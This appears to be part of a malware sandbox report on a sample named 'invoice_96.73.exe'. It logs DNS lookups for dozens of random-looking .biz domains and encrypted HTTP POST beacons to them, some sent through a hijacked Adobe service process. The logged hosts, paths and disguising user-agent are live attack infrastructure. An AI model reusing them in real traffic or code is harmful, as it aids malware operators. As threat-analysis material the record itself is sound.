                                                                                                                                                                Nov 28, 2024 12:13:38.649343014 CET192.168.2.228.8.8.80xb22Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:41.439563036 CET192.168.2.228.8.8.80xdc14Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:42.862447023 CET192.168.2.228.8.8.80xfda6Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:45.167891026 CET192.168.2.228.8.8.80xb07fStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:47.992669106 CET192.168.2.228.8.8.80x4232Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:50.120928049 CET192.168.2.228.8.8.80xf095Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:51.567184925 CET192.168.2.228.8.8.80x727dStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:54.113997936 CET192.168.2.228.8.8.80xfa1bStandard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:01.800045967 CET192.168.2.228.8.8.80x6b55Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:03.253201962 CET192.168.2.228.8.8.80x7a26Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:04.927429914 CET192.168.2.228.8.8.80x2ae4Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:06.636229038 CET192.168.2.228.8.8.80xed01Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:08.026230097 CET192.168.2.228.8.8.80x23a4Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:10.038036108 CET192.168.2.228.8.8.80x950Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:11.666867018 CET192.168.2.228.8.8.80x25d4Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:12.488692045 CET192.168.2.228.8.8.80xabc7Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:14.218981028 CET192.168.2.228.8.8.80x3928Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:15.844633102 CET192.168.2.228.8.8.80xe7a0Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:18.087620974 CET192.168.2.228.8.8.80xa192Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:19.539539099 CET192.168.2.228.8.8.80x1aa3Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:20.947062969 CET192.168.2.228.8.8.80xb742Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:23.395471096 CET192.168.2.228.8.8.80xa29aStandard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:23.751730919 CET192.168.2.228.8.8.80x7db3Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:25.457536936 CET192.168.2.228.8.8.80xc6c1Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:26.905095100 CET192.168.2.228.8.8.80x633bStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Nov 28, 2024 12:11:51.880790949 CET8.8.8.8192.168.2.220xcce2No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:51.883121967 CET8.8.8.8192.168.2.220x96baNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:53.606897116 CET8.8.8.8192.168.2.220xe817No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:53.671719074 CET8.8.8.8192.168.2.220x5662No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:55.924416065 CET8.8.8.8192.168.2.220xf993No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:57.611253023 CET8.8.8.8192.168.2.220xac3dNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:59.321238995 CET8.8.8.8192.168.2.220xc66aNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:59.321238995 CET8.8.8.8192.168.2.220xc66aNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:04.810594082 CET8.8.8.8192.168.2.220xa99eName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:04.948873997 CET8.8.8.8192.168.2.220x71b4No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.339690924 CET8.8.8.8192.168.2.220xd14bName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.464014053 CET8.8.8.8192.168.2.220xfdf5Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.600780964 CET8.8.8.8192.168.2.220xf42eNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:52.054832935 CET8.8.8.8192.168.2.220x9d6dNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:36.392750025 CET8.8.8.8192.168.2.220x6670No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:38.772140980 CET8.8.8.8192.168.2.220xb22No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:41.573719025 CET8.8.8.8192.168.2.220xdc14No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:42.996898890 CET8.8.8.8192.168.2.220xfda6No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:45.302222967 CET8.8.8.8192.168.2.220xb07fNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:45.302222967 CET8.8.8.8192.168.2.220xb07fNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:48.115710974 CET8.8.8.8192.168.2.220x4232No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:50.243944883 CET8.8.8.8192.168.2.220xf095No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:51.702402115 CET8.8.8.8192.168.2.220x727dNo error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:54.248264074 CET8.8.8.8192.168.2.220xfa1bNo error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:01.935954094 CET8.8.8.8192.168.2.220x6b55No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:03.387825966 CET8.8.8.8192.168.2.220x7a26No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:05.050311089 CET8.8.8.8192.168.2.220x2ae4No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:06.759259939 CET8.8.8.8192.168.2.220xed01No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:08.149116993 CET8.8.8.8192.168.2.220x23a4No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:08.149116993 CET8.8.8.8192.168.2.220x23a4No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:10.162388086 CET8.8.8.8192.168.2.220x950No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:11.801893950 CET8.8.8.8192.168.2.220x25d4No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:12.623533964 CET8.8.8.8192.168.2.220xabc7No error (0)jpskm.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:14.353184938 CET8.8.8.8192.168.2.220x3928No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:15.979394913 CET8.8.8.8192.168.2.220xe7a0No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:18.224440098 CET8.8.8.8192.168.2.220xa192No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:19.663516045 CET8.8.8.8192.168.2.220x1aa3No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:21.081248045 CET8.8.8.8192.168.2.220xb742No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:23.885927916 CET8.8.8.8192.168.2.220x7db3No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:25.592184067 CET8.8.8.8192.168.2.220xc6c1No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:14:27.039477110 CET8.8.8.8192.168.2.220x633bNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • pywolwnvd.biz
                                                                                                                                                                • ssbzmoy.biz
                                                                                                                                                                • cvgrf.biz
                                                                                                                                                                • npukfztj.biz
                                                                                                                                                                • przvgke.biz
                                                                                                                                                                • knjghuig.biz
                                                                                                                                                                • lpuegx.biz
                                                                                                                                                                • vjaxhpbji.biz
                                                                                                                                                                • xlfhhhm.biz
                                                                                                                                                                • ifsaia.biz
                                                                                                                                                                • saytjshyf.biz
                                                                                                                                                                • vcddkls.biz
                                                                                                                                                                • fwiwk.biz
                                                                                                                                                                • tbjrpv.biz
                                                                                                                                                                • deoci.biz
                                                                                                                                                                • gytujflc.biz
                                                                                                                                                                • qaynky.biz
                                                                                                                                                                • bumxkqgxu.biz
                                                                                                                                                                • dwrqljrr.biz
                                                                                                                                                                • oshhkdluh.biz
                                                                                                                                                                • yunalwv.biz
                                                                                                                                                                • lrxdmhrr.biz
                                                                                                                                                                • wllvnzb.biz
                                                                                                                                                                • gnqgo.biz
                                                                                                                                                                • jhvzpcfg.biz
                                                                                                                                                                • acwjcqqv.biz
                                                                                                                                                                • yauexmxk.biz
                                                                                                                                                                • iuzpxe.biz

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.224916354.244.188.177803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:11:52.049103975 CET355OUTPOST /qbdegkuges HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:11:52.049149990 CET852OUTData Raw: da a2 7e be 31 2f 5e c9 48 03 00 00 86 c5 09 5c 31 8c f8 cd 46 ce 7b 33 f7 da be f2 87 b6 3e 08 4f 29 28 10 b3 f6 7b e1 31 e6 6f 88 05 52 cc ab 42 bd e5 63 59 68 10 53 a9 8e 50 12 3b 13 11 e5 95 04 be 61 5f 17 d6 05 a9 21 06 73 17 3f 0c 36 76 70
                                                                                                                                                                Data Ascii: ~1/^H\1F{3>O)({1oRBcYhSP;a_!s?6vpC++]O.XL>e9a0ZEz2"q-OC1a:*j"1[;&Y+_\|iML4'-Ss{kYYn<?Gr8M#;K5MpL2C#k6`KqS
                                                                                                                                                                Nov 28, 2024 12:11:53.445842981 CET413INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:11:53 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=421e9b27de3d6b9b689ef6b771a998f7|8.46.123.228|1732792313|1732792313|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.224916454.244.188.177803268C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:11:52.053747892 CET355OUTPOST /qbdegkuges HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 808
                                                                                                                                                                Nov 28, 2024 12:11:52.053747892 CET808OUTData Raw: 43 2f 84 a8 84 07 6c e0 1c 03 00 00 72 8e 7f 2f 57 34 72 05 d9 a8 b5 1c 8a fa 8c 29 4d 66 67 d2 72 fe e4 80 3d 8c 81 52 2a 3c 5a 6a 86 89 58 59 ea 23 3f 99 a2 aa 9f be 4d 8a b6 e7 be 0d c6 d3 0e 9a ad dc 33 51 7b 48 89 89 60 a9 d2 d9 27 47 e8 a7
                                                                                                                                                                Data Ascii: C/lr/W4r)Mfgr=R*<ZjXY#?M3Q{H`'GE1!9'e7qC|!mX"ix=lDJk)lY'o)EhfA12K$,/nSHq:Um#JH24II|a'P8w&]
                                                                                                                                                                Nov 28, 2024 12:11:53.408859968 CET413INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:11:53 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=809b3761f185e27ce04ab0abcdbfede6|8.46.123.228|1732792313|1732792313|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.224916518.141.10.107803268C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:11:53.728768110 CET358OUTPOST /bpewylwxymwihal HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: ssbzmoy.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 808
                                                                                                                                                                Nov 28, 2024 12:11:53.728799105 CET808OUTData Raw: be 8b 45 25 13 8c 84 e5 1c 03 00 00 03 9b 8f 74 5d 8c d0 c9 0d e0 2a 1b 71 2a fb 43 58 5f b2 43 11 12 e5 58 01 c0 b4 33 0a 86 77 e0 01 23 83 ca 10 e2 4c e5 0a ef cb 14 66 b9 8c b9 47 68 7f 71 2a 46 de 2d a9 5c cd 51 4d c8 63 21 c8 1d ce 21 f5 2e
                                                                                                                                                                Data Ascii: E%t]*q*CX_CX3w#LfGhq*F-\QMc!!.qG>u%bf'DE<0UCB%(2w$HIna)w h$<gVA):7IlVSs_im$axLF/=A$q*b=>Ob4e


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.224916618.141.10.107803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:11:53.793314934 CET356OUTPOST /xuofommcmtwcs HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: ssbzmoy.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:11:53.793332100 CET852OUTData Raw: 8c a9 87 f9 6d e4 78 83 48 03 00 00 44 15 00 5d 06 98 90 a0 64 20 21 90 da 33 3d 28 44 0a 60 cc 4f a4 dd 78 4f 61 24 f6 38 34 d9 a2 13 fd 28 c3 68 79 c5 e2 df 57 70 7a 46 ca ce 45 d9 53 36 30 9d 06 a3 2d 4b 3f b6 4f 85 a3 80 c1 f4 9d f3 42 c6 48
                                                                                                                                                                Data Ascii: mxHD]d !3=(D`OxOa$84(hyWpzFES60-K?OBHZ<L#vnr<Vy$c/WD,#R'D~%]z!)jlq1YzP8Dvw-=.YrtZ.uMh<m<twrEF`
                                                                                                                                                                Nov 28, 2024 12:11:55.782172918 CET411INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:11:55 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=3219e5bd7b92d3f41966d365cc5970ca|8.46.123.228|1732792315|1732792315|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.224916754.244.188.177803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:11:56.047502041 CET344OUTPOST /dyk HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: cvgrf.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:11:56.047527075 CET852OUTData Raw: 32 22 b8 f4 b3 cf 5d 40 48 03 00 00 d6 f1 90 11 5e af 4c d3 b0 71 ab aa 29 80 6b ef bf c5 f7 9e c2 dd 72 38 15 78 6e f2 fc ba 9b 5d 99 59 53 15 a0 7b b1 6e 6d 7f 8f 62 d8 e1 11 ba 19 49 3e 5f 4b 55 a6 59 2a e4 f9 e5 bf 0b 81 17 a2 07 93 2c 49 d1
                                                                                                                                                                Data Ascii: 2"]@H^Lq)kr8xn]YS{nmbI>_KUY*,IV1SiImKyg! K' cLMFlZ(NI3PRu#&bu\Q Po1FwlPJ.F!Vp"2\+%d/Du
                                                                                                                                                                Nov 28, 2024 12:11:57.410089970 CET409INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:11:57 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=78308ab4f9f651eb0c5d103d5419703b|8.46.123.228|1732792317|1732792317|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.224916844.221.84.105803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:11:57.867679119 CET350OUTPOST /xtaadg HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: npukfztj.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:11:57.867697954 CET852OUTData Raw: e5 41 c4 65 37 17 24 e1 48 03 00 00 a7 a2 9f 6a fb a7 ec 66 5e 7a dd 73 fa d4 74 f8 0d 41 90 ac eb 0d 72 19 8e a3 f4 57 5e e6 a7 09 00 bd c9 a8 62 45 15 fd 53 c6 d5 82 83 b7 df 57 70 21 48 40 0b 15 26 5c 36 bd 0c f4 a4 bd 7d 51 1d f6 1f bc 72 7e
                                                                                                                                                                Data Ascii: Ae7$Hjf^zstArW^bESWp!H@&\6}Qr~T2OP>G.*b{fYYE!yr\Ls+~ehUljqg=_Q(.r]iNb#$[&<zrwmg[,il<F)JD?U@:
                                                                                                                                                                Nov 28, 2024 12:11:58.960014105 CET412INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:11:58 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=7871629bca75bcf8f46013795aff480e|8.46.123.228|1732792318|1732792318|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.2249169172.234.222.143803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:11:59.443458080 CET348OUTPOST /nabdw HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:11:59.443593025 CET852OUTData Raw: 94 64 08 d6 6f 08 c3 f2 48 03 00 00 c9 e4 f0 ed ef 44 0b a9 72 03 d6 26 13 03 f0 e8 c1 0f 7b 95 5e c8 6e 08 30 ac 35 c5 b8 20 3c 7d 77 d2 b1 af 9c ef 61 c2 99 6c af da d3 77 b1 01 6d 18 f2 b0 e9 5c e7 e7 b9 fb 07 6d f9 e0 03 00 8d 48 c4 68 ad 36
                                                                                                                                                                Data Ascii: doHDr&{^n05 <}walwm\mHh6y{4l$"spm{uv^&,~U!yfs\O$}7fWx4q=r(7\Tg\-B_$s''f1I.<RX"k:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.2249170172.234.222.143803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:12:03.497939110 CET355OUTPOST /vccrolpmtjge HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:12:03.497953892 CET852OUTData Raw: bb 4e c4 82 d6 62 95 2c 48 03 00 00 a5 85 e7 65 e1 61 80 e2 bc 17 8b e0 15 ea 9f bd 04 0a 12 54 0a 98 e1 0d 91 a6 2d fb 37 5a 1e 32 11 a1 12 5c fe 9a 2e 93 d1 f2 9e 49 7e 74 b5 a1 64 1a a3 12 a0 eb df 62 94 c0 85 22 0a b9 24 ef 75 9d 34 81 a4 cb
                                                                                                                                                                Data Ascii: Nb,HeaT-7Z2\.I~tdb"$u4J!d.[Txe.BeHsgb` zzE8hwM#HYxNp~`r*cvA@nng[(@hi)I:GbR


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.2.224917118.141.10.107803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:12:05.069866896 CET357OUTPOST /ydlpotfktdldc HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: knjghuig.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
